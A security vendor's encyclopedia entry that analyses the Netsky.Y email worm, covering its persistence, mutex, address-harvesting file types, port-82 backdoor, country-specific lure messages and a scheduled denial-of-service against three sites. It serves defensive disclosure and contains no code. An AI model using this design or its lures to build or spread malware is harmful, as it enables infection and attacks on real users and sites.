Home / malware Win32.Netsky.Y@mm
First posted on 21 November 2011.
Source: BitDefenderAliases :
Win32.Netsky.Y@mm is also known as I-Worm.NetSky.y, (KAV.
Explanation :
The worm spreads via email and infects by executing the attachment.
It was written in C++, compiled using VC6 and packed.
When run it first copies itself to %windir%FirewallSvr.exe and creates a link in registry pointing to it, so that it will be loaded at system startup.
Then it checks a mutex named ____--->>>>U<<<<--____ to avoid running a new copy of the worm.
After that it initializes the internal variables used for email harvesting and multiplying by setting the first email address to hukanmikloiuo@yahoo.com. Ar this time it also creates a file called f**k_you_bagle.txt in which it encodes a copy of the worm in base64 format. This file will be used later at sending emails by appending it to the email text as attachment data.
Next it creates a thread which searches drives from C: through Z: but skipping DVD/CD-ROM drives for specific file types which may contain suitable email addresses, but only up to 312661 (0x4C555) addresses.
The files scanned for email addresses must have one of the following extensions:
.eml
.txt
.php
.cfg
.mbx
.mdx
.asp
.wab
.doc
.vbs
.rtf
.uin
.shtm
.cgi
.dhtm
.adb
.tbb
.dbx
.pl
.htm
.html
.sht
.oft
.msg
.ods
.stm
.xls
.jsp
.wsh
.xml
.mht
.mmf
.nch
.ppt
The worm creates then a thread which acts as a backdoor, by opening and listening on port 82. When an attacker sends a file on this port the worm will save it as Rand.exe and execute it, where Rand is a random number in the range 0-32767.
Finally the worm creates 7 threads to send emails to the potential recipients found.
These email addresses are checked to be valid on different hardcoded servers by Mail eXcahnge look-ups.
From the country code of the destination email address the subject, body message and attachment name are chosen as follows:
the order is: country code, attachment base name, subject, body message
.de, dokument, Re: dokument, Bitte lesen Sie das Dokument.
.fr, document, Re: document, Veuillez lire le document.
.it, documento, Re: documento, Legga prego il documento.
.pt, original, Re: original, Leia por favor o original.
.no, dokumentet, Re: dokumentet, Behage lese dokumentet.
.pl, udokumentowac, Re: udokumentowac, Podobac sie przeczytac ten udokumentowac.
.fi, dokumentoida, Re: dokumentoida, Haluta kuulua dokumentoida.
.se, dokumenten, Re: dokumenten, Behaga lSsa dokumenten.
.tk, belge, Re: belge, mutlu etmek okumak belgili tanimlik belge.
If no code from the above is found the next one will be used:
.xx, document, Re: document, Please read the document.
Probably the author intended to compose the attachment name from the attachment base name to which a executable .pif extenstion would have been added, but instead attachment name is composed from the country code and the extension .pif.
From April 28 to 30 2004 the worm creates a total of 50 (49+1) threads which attempt DoS attacks on the following sites:
www.nibis.de
www.medinfo.ufl.edu
www.educa.ch
Most of the strings used by the worm are encrypted using a translation table for A-Z and a-z characters.Last update 21 November 2011